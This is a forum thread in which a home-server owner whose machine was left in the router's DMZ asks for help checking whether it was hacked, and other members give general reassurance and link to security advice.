Suspected Hacking!

[DjW0mbat]

Hi all!

 

I started a completely different question relating to my access to my Plex media and the apparent disappearance of the port mapping in my docker here, but someone pointed out a bunch of dodgy activity going on, with spammed connections coming in from worrying locations. I have shut the server down since and am desperately trying to figure out what went wrong.

 

Does anyone know (i) if I might have already been compromised somehow, and/or (ii) what mistakes I have made here? 

 

There should only be two open ports on my router, 51820 for WireGuard and 32400 for Plex. I also have the cloud flare dyndns docker that tracks my IP address and is liked to my cloudlfare to point to my domain, but I have not managed to get that working yet. 

 

I would really appreciate any help on this, obviously it's quite a stressful thing to see. 

 

Thanks in advance!

 

mackiemedia-diagnostics-20210818-0932 2.zip

[JonathanM]

4 hours ago, DjW0mbat said:

There should only be two open ports on my router, 51820 for WireGuard and 32400 for Plex.

Did you check to make sure someone didn't change router settings?

[DjW0mbat]

I just checked and found that the server seems to have been in the DMZ... really really concerning I think I put it in there early on and forgot to remove it, completely stupid thing to do!!

 

I have a strong root password, how long would it have taken for my server to get compromised? I really need to be able to see which data would have been accessed etc. 

 

Tried turning on the server but I can't seem to access it locally anymore. What's going on? 

[JonathanM]

13 minutes ago, DjW0mbat said:

Tried turning on the server but I can't seem to access it locally anymore.

Did you have a static IP configured?

Is the server IP / MAC showing up in the router as a connected device?

 

If you know the IP, try using https://<IP> if you had SSL enabled.

[DjW0mbat]

 

1 minute ago, JonathanM said:

Did you have a static IP configured?

Yeah I did

 

I’ve currently taken the Ethernet cable out to avoid any further issues, I booted into the gui directly, hoping to see if I can figure out what happened from there, where should I look for evidence of hacking? 

 

 

[JonathanM]

2 minutes ago, DjW0mbat said:

where should I look for evidence of hacking? 

Because of the way Unraid is built, typical hacks are undone every reboot. The go file is about the only place I've seen ongoing hacks planted. Other than that, if all your data is there and not deleted or corrupted, and there are no unexpected containers or VM's, then you are probably ok. There is no way I am aware of to see what was accessed.

[DjW0mbat]

Okay, and how could I access the go file? 

 

I'm looking through things in the safe mode GUI and it seems that everything is relatively normal. Does this mean that I wasn't hacked? I have some sensitive data on there so I would really like to be able to see if that was accessed/copied. 

 

I also still can't seem to access the server through it's fixed IP which is worrying me, what could that mean? 

 

Sorry for all the questions, this has made me really anxious! Lesson well and truly learned...

[Lipps ForHer]

Same just happened here, couldn't access thru ip. server was revving up worrying me. hard shutdown/restarted and now have access but not sure what happened. had an odd ip that kept connecting to server (pfsense logs) . wasnt sure if getting hacked also but i did just download new unraid beta recently and signed in so not sure if something to do with that. you said you unplugged ethernet tho, so maybe forgot and that's why you cannot log in?

[trurl]

1 hour ago, DjW0mbat said:

the go file?

According to your Diagnostics you have the stock go file so nothing planted there.

[DjW0mbat]

Thanks so much for your help and your time @JonathanM and @trurl, do you think it looks like someone ended up gaining access to my server? It sounds like if they had my files would have been far more corrupted? 

 

It would give me great peace of mind if you could tell me that.

 

Thanks again for all the help!

[JonathanM]

7 minutes ago, DjW0mbat said:

do you think it looks like someone ended up gaining access to my server?

If the only thing they did was look around and download files, there is no way I know of to tell after the fact. However, most intrusions aren't just for browsing, they are trying to make money. They do that by either encrypting your files and asking for ransom to decrypt them, or they try to install remote controlled software that mines cryptocoin, attacks other machines, or does whatever they tell it to do.

 

So, no, odds are that they didn't gain full access, or didn't attack it properly and Unraid's unconventional architecture foiled their efforts.

[DjW0mbat]

Thanks so so much for this, that is SUCH a relief!

 

Fingers have been well and truly burned haha, I will be sure to take much more care moving forward...

 

[ljm42]

This blog post has several recommendations for securing your server:

  https://unraid.net/blog/unraid-server-security-best-practices

 

For instance, there is a plugin called Fix Common Problems that will alert you if there are multiple failed login attempts

[DjW0mbat]

Yeah I already installed it to make sure the original issue had been resolved, looks like there are only a few minor (non-network-related) tweaks remaining